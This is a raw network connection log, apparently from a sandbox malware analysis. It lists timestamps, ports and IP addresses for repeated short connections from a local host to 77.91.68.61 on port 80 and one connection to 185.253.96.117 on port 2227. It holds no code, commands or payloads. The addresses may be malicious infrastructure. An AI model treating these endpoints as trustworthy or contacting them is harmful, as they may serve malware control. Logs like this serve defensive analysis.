Jul 27, 2023 01:35:01.391483068 CEST	80	50178	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.391585112 CEST	50178	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.391747952 CEST	80	50179	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.391825914 CEST	50179	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.397494078 CEST	50179	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.441776037 CEST	80	50179	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.447036028 CEST	80	50179	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.447191954 CEST	50179	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.565242052 CEST	50179	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.566117048 CEST	50180	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.609657049 CEST	80	50179	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.609751940 CEST	50179	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.610733986 CEST	80	50180	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.610838890 CEST	50180	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.611268044 CEST	50180	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.655765057 CEST	80	50180	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.660238028 CEST	80	50180	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.660317898 CEST	50180	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.785284996 CEST	50180	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.786207914 CEST	50181	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.830167055 CEST	80	50180	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.830271959 CEST	50180	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.830595016 CEST	80	50181	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.830713034 CEST	50181	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.831653118 CEST	50181	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.875705957 CEST	80	50181	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.880060911 CEST	80	50181	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.880204916 CEST	50181	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.029675007 CEST	50181	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.030522108 CEST	50182	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.073755026 CEST	80	50181	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.073883057 CEST	50181	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.075177908 CEST	80	50182	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.075324059 CEST	50182	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.075645924 CEST	50182	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.122253895 CEST	80	50182	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.124536991 CEST	80	50182	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.124609947 CEST	50182	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.242468119 CEST	50182	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.243074894 CEST	50183	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.287816048 CEST	80	50182	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.287853003 CEST	80	50183	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.287893057 CEST	50182	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.287956953 CEST	50183	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.288458109 CEST	50183	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.332711935 CEST	80	50183	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.336810112 CEST	80	50183	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.336867094 CEST	50183	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.449672937 CEST	50183	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.475481033 CEST	50184	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.494313955 CEST	80	50183	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.494481087 CEST	50183	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.520440102 CEST	80	50184	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.520584106 CEST	50184	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.522789955 CEST	50184	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.567553043 CEST	80	50184	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.571909904 CEST	80	50184	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.571995020 CEST	50184	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.699985027 CEST	50184	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.700664043 CEST	50185	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.749474049 CEST	80	50184	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.749511957 CEST	80	50185	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.749576092 CEST	50184	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.749641895 CEST	50185	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.750274897 CEST	50185	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.794647932 CEST	80	50185	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.798386097 CEST	80	50185	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.798468113 CEST	50185	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.909836054 CEST	50185	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.910650015 CEST	50186	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.954586983 CEST	80	50185	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.954677105 CEST	50185	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.954891920 CEST	80	50186	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:02.954987049 CEST	50186	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.955490112 CEST	50186	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:02.999728918 CEST	80	50186	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.004086018 CEST	80	50186	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.004173040 CEST	50186	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.148766994 CEST	50186	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.149668932 CEST	50187	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.193170071 CEST	80	50186	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.193270922 CEST	50186	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.193999052 CEST	80	50187	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.194096088 CEST	50187	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.195997953 CEST	50187	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.240211964 CEST	80	50187	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.244323969 CEST	80	50187	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.244421005 CEST	50187	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.366996050 CEST	50187	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.367942095 CEST	50188	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.411817074 CEST	80	50187	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.411932945 CEST	50187	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.412437916 CEST	80	50188	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.412605047 CEST	50188	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.417381048 CEST	50188	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.466196060 CEST	80	50188	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.466233969 CEST	80	50188	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.466334105 CEST	50188	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.583312988 CEST	50188	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.584204912 CEST	50189	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.627783060 CEST	80	50188	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.627898932 CEST	50188	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.628411055 CEST	80	50189	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.628483057 CEST	50189	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.629734039 CEST	50189	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.674026012 CEST	80	50189	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.678180933 CEST	80	50189	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.678395033 CEST	50189	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.803280115 CEST	50189	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.804745913 CEST	50190	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.847847939 CEST	80	50189	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.848016977 CEST	50189	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.848870993 CEST	80	50190	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.850609064 CEST	50190	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.876533985 CEST	50190	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:03.920641899 CEST	80	50190	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.925690889 CEST	80	50190	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:03.925816059 CEST	50190	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.048779011 CEST	50190	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.053221941 CEST	50191	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.092873096 CEST	80	50190	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:04.093087912 CEST	50190	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.097527981 CEST	80	50191	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:04.097626925 CEST	50191	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.100732088 CEST	50191	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.145466089 CEST	80	50191	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:04.149221897 CEST	80	50191	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:04.149341106 CEST	50191	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.274724007 CEST	50191	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.275865078 CEST	50192	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.319104910 CEST	80	50191	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:04.320198059 CEST	80	50192	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:04.320297956 CEST	50191	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.320360899 CEST	50192	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.331115961 CEST	50192	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.375122070 CEST	80	50192	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:04.379405975 CEST	80	50192	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:04.379921913 CEST	50192	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.608763933 CEST	50192	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.609486103 CEST	50193	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.652952909 CEST	80	50192	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:04.653983116 CEST	80	50193	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:04.654136896 CEST	50192	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.654186010 CEST	50193	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:04.980048895 CEST	50193	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.024794102 CEST	80	50193	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:05.029568911 CEST	80	50193	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:05.029678106 CEST	50193	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.291948080 CEST	50193	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.292725086 CEST	50194	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.338553905 CEST	80	50193	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:05.338577986 CEST	80	50194	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:05.338687897 CEST	50193	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.338725090 CEST	50194	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.356295109 CEST	50194	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.400228977 CEST	80	50194	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:05.404376984 CEST	80	50194	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:05.404750109 CEST	50194	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.643851042 CEST	50194	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.644890070 CEST	50195	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.688616991 CEST	80	50194	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:05.688699961 CEST	50194	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.689302921 CEST	80	50195	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:05.689407110 CEST	50195	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.694139957 CEST	50195	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:05.738470078 CEST	80	50195	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:05.742090940 CEST	80	50195	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:05.742187977 CEST	50195	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:06.452435970 CEST	50195	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:06.454277039 CEST	50196	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:06.497055054 CEST	80	50195	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:06.497165918 CEST	50195	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:06.499013901 CEST	80	50196	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:06.499299049 CEST	50196	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:06.529524088 CEST	50196	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:06.574265003 CEST	80	50196	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:06.579072952 CEST	80	50196	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:06.579253912 CEST	50196	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.096852064 CEST	50196	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.097944975 CEST	50197	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.141999960 CEST	80	50196	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.142081022 CEST	50196	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.142721891 CEST	80	50197	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.142832041 CEST	50197	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.156431913 CEST	50197	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.200628042 CEST	80	50197	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.209136009 CEST	80	50197	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.209274054 CEST	50197	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.429508924 CEST	50197	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.460544109 CEST	50198	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.474868059 CEST	80	50197	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.474967003 CEST	50197	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.504821062 CEST	80	50198	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.504930019 CEST	50198	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.522572041 CEST	50198	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.566848040 CEST	80	50198	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.571213961 CEST	80	50198	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.571296930 CEST	50198	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.704013109 CEST	50198	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.706105947 CEST	50199	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.748562098 CEST	80	50198	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.748653889 CEST	50198	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.750471115 CEST	80	50199	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.750564098 CEST	50199	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.753145933 CEST	50199	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.797560930 CEST	80	50199	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.801218033 CEST	80	50199	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.801285028 CEST	50199	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.919609070 CEST	50199	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.920551062 CEST	50200	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.963783026 CEST	80	50199	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.964207888 CEST	50199	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.964770079 CEST	80	50200	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:08.964890003 CEST	50200	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:08.989923954 CEST	50200	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.004199028 CEST	50201	2227	192.168.2.5	185.253.96.117
Jul 27, 2023 01:35:09.027964115 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.028050900 CEST	50201	2227	192.168.2.5	185.253.96.117
Jul 27, 2023 01:35:09.028194904 CEST	50201	2227	192.168.2.5	185.253.96.117
Jul 27, 2023 01:35:09.028285027 CEST	50201	2227	192.168.2.5	185.253.96.117
Jul 27, 2023 01:35:09.034302950 CEST	80	50200	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.038420916 CEST	80	50200	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.038505077 CEST	50200	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.051587105 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.051656961 CEST	50201	2227	192.168.2.5	185.253.96.117
Jul 27, 2023 01:35:09.051786900 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.051809072 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.051831961 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.051850080 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.051867008 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.051883936 CEST	50201	2227	192.168.2.5	185.253.96.117
Jul 27, 2023 01:35:09.051940918 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.051960945 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.052081108 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.052098989 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.075489998 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.075534105 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.075551987 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.075570107 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.081135035 CEST	2227	50201	185.253.96.117	192.168.2.5
Jul 27, 2023 01:35:09.081223011 CEST	50201	2227	192.168.2.5	185.253.96.117
Jul 27, 2023 01:35:09.151623964 CEST	50200	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.152290106 CEST	50202	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.195965052 CEST	80	50200	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.196074963 CEST	50200	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.196455956 CEST	80	50202	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.196544886 CEST	50202	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.203795910 CEST	50202	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.247986078 CEST	80	50202	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.252526045 CEST	80	50202	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.252604961 CEST	50202	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.392739058 CEST	50202	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.393619061 CEST	50203	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.437186003 CEST	80	50202	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.437271118 CEST	50202	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.438374043 CEST	80	50203	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.438492060 CEST	50203	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.485951900 CEST	50203	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.530642986 CEST	80	50203	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.535618067 CEST	80	50203	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.535722017 CEST	50203	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.654304028 CEST	50203	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.655047894 CEST	50204	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.699117899 CEST	80	50203	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.699934959 CEST	80	50204	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.700123072 CEST	50203	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.700172901 CEST	50204	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.701885939 CEST	50204	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.746766090 CEST	80	50204	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.751578093 CEST	80	50204	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.752614021 CEST	50204	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.866384983 CEST	50204	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.867083073 CEST	50205	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:09.911324978 CEST	80	50204	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:09.911418915 CEST	50204	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:12.892899036 CEST	50205	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:12.937330008 CEST	80	50205	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:12.937629938 CEST	50205	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:12.938021898 CEST	50205	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:12.982315063 CEST	80	50205	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:12.987503052 CEST	80	50205	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:12.987600088 CEST	50205	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.104346991 CEST	50205	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.106839895 CEST	50206	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.149353027 CEST	80	50205	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.149425030 CEST	50205	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.151339054 CEST	80	50206	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.151453018 CEST	50206	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.154913902 CEST	50206	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.199275970 CEST	80	50206	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.203790903 CEST	80	50206	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.203876019 CEST	50206	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.326435089 CEST	50206	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.327092886 CEST	50207	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.371145010 CEST	80	50207	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.371336937 CEST	50207	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.371493101 CEST	80	50206	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.371611118 CEST	50206	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.371833086 CEST	50207	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.416120052 CEST	80	50207	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.419878006 CEST	80	50207	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.419965029 CEST	50207	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.579272985 CEST	50207	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.580673933 CEST	50208	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.623445034 CEST	80	50207	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.623543978 CEST	50207	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.625134945 CEST	80	50208	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.625230074 CEST	50208	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.630388021 CEST	50208	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.675035954 CEST	80	50208	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.679733992 CEST	80	50208	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.679802895 CEST	50208	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.792956114 CEST	50208	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.793847084 CEST	50209	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.837357044 CEST	80	50208	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.837459087 CEST	50208	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.837969065 CEST	80	50209	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.838076115 CEST	50209	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.841682911 CEST	50209	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:13.885699034 CEST	80	50209	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.889502048 CEST	80	50209	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:13.890147924 CEST	50209	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.010659933 CEST	50209	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.011356115 CEST	50210	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.055028915 CEST	80	50209	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.055229902 CEST	50209	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.056108952 CEST	80	50210	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.056204081 CEST	50210	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.069689989 CEST	50210	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.114962101 CEST	80	50210	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.118407965 CEST	80	50210	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.118596077 CEST	50210	80	192.168.2.5	77.91.68.61
